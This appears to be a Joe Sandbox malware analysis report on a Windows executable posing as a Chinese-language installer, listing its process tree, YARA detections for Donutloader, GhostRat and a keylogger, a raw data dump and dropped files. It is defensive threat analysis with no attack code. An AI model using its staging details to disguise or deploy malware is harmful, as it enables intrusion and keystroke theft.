2025-03-13 09:50:57 UTC	5216	IN	Data Raw: 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 02 0f 00 30 82 02 0a 02 82 02 01 00 c5 7d a9 39 ec ea 61 f6 fb b1 b6 5a 00 06 22 dc e9 e9 d3 fb 22 87 eb 5f 5b f8 e8 46 76 4c a1 80 dc e4 5f cd 0a 50 62 3f 8c 4a 8e 54 c5 78 4a ab 7f 50 f1 45 89 dc 76 b7 bb f6 48 44 e3 da d0 33 b9 52 ad 0d fa b6 1c 1a 6e f3 4b d9 d2 fc 90 0f 27 55 b7 83 03 2f 8b 49 48 aa a0 62 87 c2 c4 32 01 ad 6c c9 26 38 01 a2 52 9d 38 9c 75 ba dd 93 c8 e7 3e 50 e9 bb 7b dd ad 54 f1 e9 8d d8 3e 3a 67 f7 d5 32 d4 7f fa 28 bb 20 0e 27 f2 27 9f 68 a1 dc 04 8f d1 06 26 f8 01 50 8e 16 03 34 3b bc bb 33 1d c0 71 79 41 dc 2c b1 c3 5a f4 f5 52 19 e7 4b 74 32 e8 f6 32 fa 0e 83 c5 e0 d6 28 d3 a9 6f bc 44 2e 48 9f 48 9b 06 5f 04 62 f2 ff c8 69 13 b4 43 e1 ec 2f 24 a9 8c d7 eb 7a 79 0b 84 b1 35 e3 Data Ascii: 0*H0}9aZ""_[FvL_Pb?JTxJPEvHD3RnK'U/IHb2l&8R8u>P{T>:g2( ''h&P4;3qyA,ZRKt22(oD.HH_biC/$zy5

Target ID:	4
Start time:	05:50:21
Start date:	13/03/2025
Path:	C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe"
Imagebase:	0x10000
File size:	469'104 bytes
MD5 hash:	43CC53FA23D293CFBE704EAB6EAFB042
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000004.00000002.2313605934.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:50:22
Start date:	13/03/2025
Path:	C:\Windows\System32\OpenWith.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\OpenWith.exe -Embedding
Imagebase:	0x7ff65c340000
File size:	123'984 bytes
MD5 hash:	E4A834784FA08C17D47A1E72429C5109
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:50:56
Start date:	13/03/2025
Path:	C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe"
Imagebase:	0x7ff694000000
File size:	350'096 bytes
MD5 hash:	58B4104495B166543884397497FE2243
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000003.1780225829.000002A39D4D2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000003.1782816540.000002A39D4D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000003.1781387142.000002A39D4DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000003.1773029245.000002A39D4DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000003.1770409862.000002A39D2D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000003.1778381910.000002A39D4D5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000003.1784322808.000002A39D4D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:51:25
Start date:	13/03/2025
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b4d0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000C.00000003.3075008585.000000000C131000.00000004.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000C.00000002.3148591529.000000000C0F8000.00000004.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000C.00000003.3075284546.000000000C0DC000.00000004.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000C.00000003.3075862798.000000000C0E5000.00000004.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000C.00000003.3075284546.000000000C0A9000.00000004.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000C.00000003.3075911766.000000000C0F1000.00000004.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000C.00000002.3148264683.000000000C0A9000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	05:51:29
Start date:	13/03/2025
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff72b4d0000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 0000000D.00000002.3135754043.0000000002190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000D.00000002.3132436281.0000000000600000.00000020.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	05:51:40
Start date:	13/03/2025
Path:	C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe"
Imagebase:	0x7ff6f46c0000
File size:	54'528 bytes
MD5 hash:	1112642D4A051570A4CC0363136A16FD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 0000000E.00000002.3133593277.0000000001013000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	05:51:40
Start date:	13/03/2025
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\rundll32.exe
Imagebase:	0x7ff7df850000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000010.00000002.3133400888.000001A3542C0000.00000020.00000001.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000010.00000002.3135862106.000001A3545B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	05:51:41
Start date:	13/03/2025
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 7888 -s 368
Imagebase:	0x7ff6984f0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	05:52:01
Start date:	13/03/2025
Path:	C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe
Imagebase:	0x7ff694000000
File size:	350'096 bytes
MD5 hash:	58B4104495B166543884397497FE2243
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.2309579287.00000187C7E31000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.2305223765.00000187C7E3C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000003.2303072630.00000187C7E31000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	05:53:00
Start date:	13/03/2025
Path:	C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe
Imagebase:	0x7ff694000000
File size:	350'096 bytes
MD5 hash:	58B4104495B166543884397497FE2243
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000003.2894886210.000002A1A5F4D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000003.2899359895.000002A1A5F4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000015.00000003.2892830488.000002A1A5F4B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_kitty.exe_d1ad3560a01f817f9eac77e9b1d483a5b4d6f089_50dbb93c_6832931e-cb72-413b-a58e-7af635475308\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8E3.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER951.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER981.tmp.xml

C:\ProgramData\kernelquick.sys

C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\MSVCP140.dll

C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\OWUtils.dll

C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\VCRUNTIME140.dll

C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\blackdll.dll

C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\kitty.exe

C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\md5.ini

C:\Users\user\4AAA4BEA-4B49-4018-AEDB-86BCC9AEB23A\vcruntime140_1.dll

C:\Users\user\8cb0240ffaae4\MSVCP140.dll

C:\Users\user\8cb0240ffaae4\Microsoft_Xtools.exe

Windows Analysis Report
#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe